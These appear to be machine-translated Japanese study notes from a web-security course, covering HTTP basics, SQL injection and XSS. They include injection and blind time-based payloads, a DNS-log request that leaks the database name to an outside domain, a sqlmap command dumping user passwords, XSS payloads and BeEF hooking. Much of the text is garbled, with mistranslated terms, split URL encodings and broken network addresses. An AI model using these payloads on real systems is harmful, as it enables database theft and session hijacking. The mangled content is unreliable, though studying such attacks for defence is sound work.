DAY 1

2271 ワード

一http基礎
http依頼方式
urlを入力して、まずDNSキャッシュ(hosts)を探して、ipアドレスを探してhttp要求を送信して、先にapphサーバー(もしアクセスするならば.htmlファイル、自分で処理することができます)、phpはphpスクリプトエンジンに手渡して処理に行って、MySQLデータベースにアクセスして、それからブラウザーに返事します.
Url用ですか?転送データeg:www.xxxxxx.com/admin.php?id=?
urlコード
安全でない文字をエンコーディングします.%3 d=%20スペース、%0 a新行、%00孔子杰
http応答
要求新聞httpプロトコルバージョンのステータスコード:200(アクセス成功)
httpが新聞を頼む
http要求方法:POST、GET、HEAD、PUT…
ヘッダを要求
Host:要求されたホスト名は、複数のドメイン名が同じところにあるIPアドレス、すなわち仮想ホストを許可する.User-Agent:要求を生成するブラウザタイプ.Accept:クライアントが識別できるコンテンツタイプのリスト.Acceept Enccoding:要求ヘッダ領域はAcceptと類似しているが、許容可能なコンテンツ符号化を指定するために使用される.Acceept-Language:要求ヘッダ領域はAcceptと類似しているが、自然言語を指定するためのものである.Referer:前のリソースのURLです.Connection:Closeの値が設定されている場合は、応答のファイルをサーバに送信して接続をオフにし、Keep-Aliveの場合は、本要求の応答を完了した後、接続を維持するようにサーバに伝えます.
会話技術
・cookieまたはsession・cookieでブラウザ・セッションをサーバに保存する
sessionの生成クライアントの最初の要求・sessionIDの作成・超グローバル変数_の初期化SESSIONに保存されているすべてのデータは、SessionIdに対応するファイルにプロビジョニングされています.SESSIONはSETCOOKIEとしてクライアントに戻ります.
クライアント再要求・クライアントのCOOKIEを検出したSESSIONID・初期化超グローバル変数_SESSION中ですスクリプトの実行が終了しました.SESSIONに保存されているすべてのデータは、SESSIONID対応のファイルにプログレッシブに格納されています.
burpsuit
プロキシを設定すればいいです
二SQL注入
     sql  ,      
・sql注入ポイントを探しています.GET POST COOKIE httpヘッダ
SQL注入ポイントの基礎を確定する:・万能パスワード1'and'1'='1(イメージノート)ブラインド注:・ブールブラインド注ID=1 and if(database=',sleep(5),1)DNS:・LOGはクライアントにhttp要求を送信する:http://x.cn?id=1 AND LOCAL_FILE(CONCAT('\',DATABASE(),'1.xn.cn\a')
自動化ツール:sqlmap
      sqlmap -u"url" -v 3 -D vul(     ) -T users -C "id,username,password" --dump 
3 xss
反射型xss(データベースなし)alert(1)格納型xss(payloadは格納されます)
DOM型xss・住所欄に記入し、記入したところはまず'で閉じ、後は//で後の内容を注釈してpayload='onclick=alert(1)//に落とします.
beefの使用(xssプラットフォーム)
kaliのネットワークセグメントを設定します.beef-xssは与えられたパスロードでファイルを作成します.ブラウザにドラッグしてもいいです.
xssプラットフォーム:https://xsspt.com/kaliを自身で登録して、ipをブリッジモードに変更した後、ネットカードのIPアドレス過程vim/etc/network/interface atot eth 0 iface eth 0 inet static address 192.168.96 netmark 255.255.25 gateway 192.168.91 dns-nameserver
service networking restart ifdown eth 0 ifup eth 0
xss防御
コード層アーキテクチャ層・httponly・WAF・Htmlen.com(転送)